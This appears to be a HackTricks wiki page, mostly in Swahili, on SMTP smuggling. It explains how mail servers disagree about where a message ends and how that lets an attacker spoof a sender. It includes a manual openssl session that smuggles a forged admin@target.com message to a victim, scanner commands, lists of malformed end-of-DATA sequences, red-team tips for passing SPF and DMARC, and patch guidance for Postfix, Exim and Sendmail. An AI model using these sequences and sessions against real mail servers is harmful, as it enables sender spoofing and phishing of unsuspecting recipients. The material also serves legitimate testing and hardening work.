SMTP Smuggling

Reading time: 7 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Taarifa za Msingi

This type of vulnerability was originally discovered in this post were it's explained that It's possible to exploit discrepancies in how the SMTP protocol is interpreted when finalising an email, allowing an attacker to smuggle more emails in the body of the legit one, allowing to impersonate other users of the affected domain (such as admin@outlook.com) bypassing defenses such as SPF.

Kwa Nini

Hii ni kwa sababu katika protocol ya SMTP, data ya ujumbe ambayo itatumwa kwa email inadhibitiwa na mtumiaji (mshambuliaji) ambaye anaweza kutuma data iliyotengenezwa mahsusi akitumia tofauti za parsers ambazo zitamsmuggle barua za ziada katika mpokeaji. Tazama mfano huu uliobainishwa kutoka kwenye chapisho la asili:

https://sec-consult.com/fileadmin/user_upload/sec-consult/Dynamisch/Blogartikel/2023_12/SMTP_Smuggling-Overview__09_.png

Jinsi

Ili kuchukua faida ya udhaifu huu mshambuliaji anahitaji kutuma data ambayo Outbound SMPT server inadhani ni barua moja tu lakini Inbound SMTP server inadhani kuna barua kadhaa.

Watafiti waligundua kwamba server tofauti za Inbound zinachukulia herufi tofauti kama mwisho wa data ya ujumbe wa email ambayo Outbound servers hazifanyi hivyo.
Kwa mfano, mwisho wa kawaida wa data ni \r\n.\r. Lakini ikiwa Inbound SMTP server pia inaunga mkono \n., mshambuliaji anaweza tu kuongeza hiyo data katika barua yake na kuanza kuonyesha amri za SMTP za ujumbe mpya ili kui smuggle kama ilivyo kwenye picha hapo juu.

Kwa uhakika, hii inaweza kufanya kazi tu ikiwa Outbound SMTP server haitachukulia pia data hii kama mwisho wa data ya ujumbe, kwa sababu katika hiyo hali itakuwa inaona barua 2 badala ya 1, kwa hivyo mwishowe hii ndiyo desynchronization inayotumiwa katika udhaifu huu.

Potential desynchronization data:

\n.
\n.\r

Pia kumbuka kwamba SPF inavuka kwa sababu ikiwa utasmuggle email kutoka admin@outlook.com kutoka kwa email ya user@outlook.com, mtumaji bado ni outlook.com.

Orodha ya mshambuliaji (vigezo vinavyotakiwa?)

Ili kuweza kupitisha barua ya pili kwa mafanikio, kwa kawaida unahitaji:

Outbound server A unayoweza kutuma kupitia (mara nyingi kwa creds halali) ambayo itapeleka muundo wa mwisho wa DATA usio wa kawaida bila kubadilika. Huduma nyingi kihistoria zilituma tofauti kama \n.\r\n au \n.\n.
Receiving server B ambayo itatafsiri ule muundo usio wa kawaida kama mwisho wa DATA na kisha itachambua chochote kinachofuata kama amri mpya za SMTP (MAIL/RCPT/DATA...).
Outbound lazima kwa kweli itumie DATA (si BDAT). Ikiwa A inaunga CHUNKING/BDAT, smuggling inafanya kazi tu ikiwa itarudisha nyuma kwa DATA (mfano, B haitangaza CHUNKING), vinginevyo BDAT yenye framing ya urefu inazuia utata.
PIPELINING haohitaji lakini inasaidia kuficha amri zilizowekwa ndani ya TCP write moja ili vifaa vya katikati visirekebishe tena mfuatano.

Aina za kawaida za mwisho‑wa‑DATA zinazostahili kujaribiwa (zinategemea mpokeaji):

\n.\n
\n.\r\n
\r.\r\n
\r\n.\r (bare CR at end)

Kumbuka: Kinachofanya kazi ni mkusanyiko wa “what A forwards” ∩ “what B accepts”.

Mfano wa shambulio kwa mkono (kikao kimoja)

Ifuatavyo linaonyesha wazo kutumia kikao cha raw STARTTLS SMTP. Baada ya block ya kwanza ya DATA tunaingiza terminator usio‑wa‑kawaida, kisha mazungumzo mengine ya SMTP ambayo server ya kupokea inaweza kuyachukulia kama ujumbe mpya.

Kikao cha smuggling kwa mkono (STARTTLS)

``` $ openssl s_client -starttls smtp -crlf -connect smtp.example.com:587 EHLO a.example AUTH PLAIN MAIL FROM: RCPT TO: DATA From: User To: victim Subject: legit

hello A \n.\r\nMAIL FROM:admin@target.com RCPT TO:victim@target.com DATA From: Admin admin@target.com To: victim victim@target.com Subject: smuggled

hello B \r\n.\r\n

If A inatuma `\n.\r\n` na B inakubali kama end‑of‑DATA, ujumbe “hello B” unaweza kukubaliwa kama barua pepe ya pili kutoka `admin@target.com` huku ukipita SPF (unaolingana na IP za A).
</details>

Tip: Unapojaribu kwa njia ya maingiliano, hakikisha `-crlf` inatumiwa ili OpenSSL ihifadhi CRLF katika unachokiandika.

---

## Automatiki na scanners

- hannob/smtpsmug: tuma ujumbe unaomalizika kwa mfululizo wa malformed end‑of‑DATA sequences ili kuona mpokeaji anachokubali.
- Example: `./smtpsmug -s mail.target.com -p 25 -t victim@target.com`
- The‑Login/SMTP‑Smuggling‑Tools: scanner kwa pande zote za inbound na outbound pamoja na analysis SMTP server ili kuona kwa usahihi ni zipi sequences zinazodumu kutoka kwa sender.
- Inbound quick check: `python3 smtp_smuggling_scanner.py victim@target.com`
- Outbound via a relay: `python3 smtp_smuggling_scanner.py YOUR@ANALYSIS.DOMAIN --outbound-smtp-server smtp.relay.com --port 587 --starttls --sender-address you@relay.com --username you@relay.com --password '...'
`

Zana hizi zinakusaidia kubainisha jozi za A→B ambapo smuggling inafanya kazi.

---

## CHUNKING/BDAT vs DATA

- DATA hutumia sentinel terminator `<CR><LF>.<CR><LF>`; utata wowote jinsi CR/LF zinavyosawazishwa au dot‑stuffed husababisha desync.
- CHUNKING (BDAT) inaweka body kwa urefu sahihi wa byte na kwa hivyo inazuia classic smuggling. Hata hivyo, ikiwa sender atarejea kwenye DATA (kwa sababu receiver haitangaza CHUNKING), classic smuggling inakuwa tena inawezekana.

---

## Vidokezo juu ya programu zilizoathirika na marekebisho (kwa target)

- Postfix: kabla ya 3.9 default ilikuwa kuvumilia bare LFs; kuanzia 3.5.23/3.6.13/3.7.9/3.8.4 wasimamizi wanaweza kuwezesha `smtpd_forbid_bare_newline`. Pendekezo la sasa ni `smtpd_forbid_bare_newline = normalize` (3.8.5+/3.7.10+/3.6.14+/3.5.24+) au usanidi wa `reject` kwa utekelezaji mkali wa RFC.
- Exim: imerekebishwa katika 4.97.1 (na baadaye) kwa warianti zinazotegemea mchanganyiko wa end‑of‑DATA sequences wakati DATA inatumiwa. Toleo za zamani 4.97/4.96 zinaweza kuwa zinatumika kulingana na PIPELINING/CHUNKING.
- Sendmail: imerekebishwa katika 8.18; toleo za zamani 8.17.x zilikubali baadhi ya terminators zisizo za kawaida.
- Maktaba/servers mbalimbali (e.g., aiosmtpd before 1.4.5, baadhi ya vendor gateways, na specific SaaS relays) zilikuwa na matatizo kama hayo; toleo za kisasa kwa ujumla zinakubali DATA tu na strict `<CR><LF>.<CR><LF>`.

Tumia scanners zilizotajwa hapo juu kuthibitisha tabia ya sasa; wauzaji wengi walibadilisha defaults mapema 2024–2025.

---

## Vidokezo kwa red team ops

- Tumia large commodity senders kwa A (kwa kihistoria Exchange Online, shared hosters, n.k.). Ikiwa bado wanatuma baadhi ya non‑standard EOM na wako ndani ya SPF ya mwathirika, MAIL FROM uliosmuggled utajipatia sifa yao.
- Orodhesha extensions za SMTP za B: `EHLO` banner kwa PIPELINING/CHUNKING; ikiwa CHUNKING haipo una nafasi kubwa zaidi kutoka kwa BDAT‑first senders. Changanya na malformed EOMs kujaribu kukubaliwa.
- Angalia headers: ujumbe uliosmuggled kwa kawaida utaunda Received chain tofauti kuanzia B. DMARC mara nyingi itapita kwa sababu MAIL FROM inalingana na anuwai ya IP za A.

---

## References

- [https://sec-consult.com/blog/detail/smtp-smuggling-spoofing-e-mails-worldwide/](https://sec-consult.com/blog/detail/smtp-smuggling-spoofing-e-mails-worldwide/)
- [https://www.postfix.org/smtp-smuggling.html](https://www.postfix.org/smtp-smuggling.html)

<div class="mdbook-alerts mdbook-alerts-tip">
<p class="mdbook-alerts-title">
  <span class="mdbook-alerts-icon"></span>
  tip
</p>


Jifunze na fanya mazoezi ya AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
Jifunze na fanya mazoezi ya Azure Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://training.hacktricks.xyz/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">

<details>

<summary>Support HackTricks</summary>

- Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
- **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
- **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.

</details>

</div>